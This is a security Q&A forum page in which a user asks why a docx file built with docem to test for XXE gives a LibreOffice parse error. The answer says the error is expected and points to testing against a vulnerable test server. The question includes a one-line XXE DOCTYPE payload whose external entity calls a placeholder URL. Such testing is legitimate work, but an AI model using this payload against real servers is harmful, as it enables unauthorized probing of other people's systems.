My goal is to create a docx file that, when uploaded to a server and parsed there, causes the parser to fetch my url so I know it worked.
Unfortunately, I only have Libre Office and not MS Office at my hands. When I open the file with Libre Office, I get an error:
SAXException: [word/document.xml line 2]: Entity ‘xxe’ not defined
Seems like I did something wrong with my XML syntax, but I can’t figure out what.
The document.xml in the file starts like this:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "thisismyurl">]><w:document (...)
(Replaced my actual url for readability)
And then later, I have:
I created my file with docem. Using the predefined docem payloads results in the same error. Any idea what could have gone wrong? Thank you a lot!
You probably are supposed to get an error. You just injected "something" into the xml parts of the docx file which the application(Word or Libre) isn't used to reading and thus it doesn't understand how to process and display that. If you're trying to test it, you should be uploading it to a Test Server with a vulnerable parser and then check for any pingbacks to your Server/Url.
Answered by Satyam Gothi on November 5, 2020
3 Asked on February 27, 2021 by rfix
1 Asked on February 24, 2021 by awokeknowing
1 Asked on February 21, 2021 by paprika
2 Asked on February 19, 2021 by aleph
2 Asked on February 19, 2021 by karlis-filipsons
0 Asked on February 17, 2021 by schaueho
1 Asked on February 13, 2021 by riccardo-d
1 Asked on February 13, 2021 by dotcs
1 Asked on February 11, 2021 by ios-learner
0 Asked on February 10, 2021 by begs-the-hessian
1 Asked on February 9, 2021 by cronos
1 Asked on February 5, 2021 by h-f
0 Asked on February 2, 2021 by sdgfsdh
1 Asked on January 28, 2021 by kreysix
1 Asked on January 25, 2021 by user855
0 Asked on January 21, 2021 by compsciguy
Get help from others!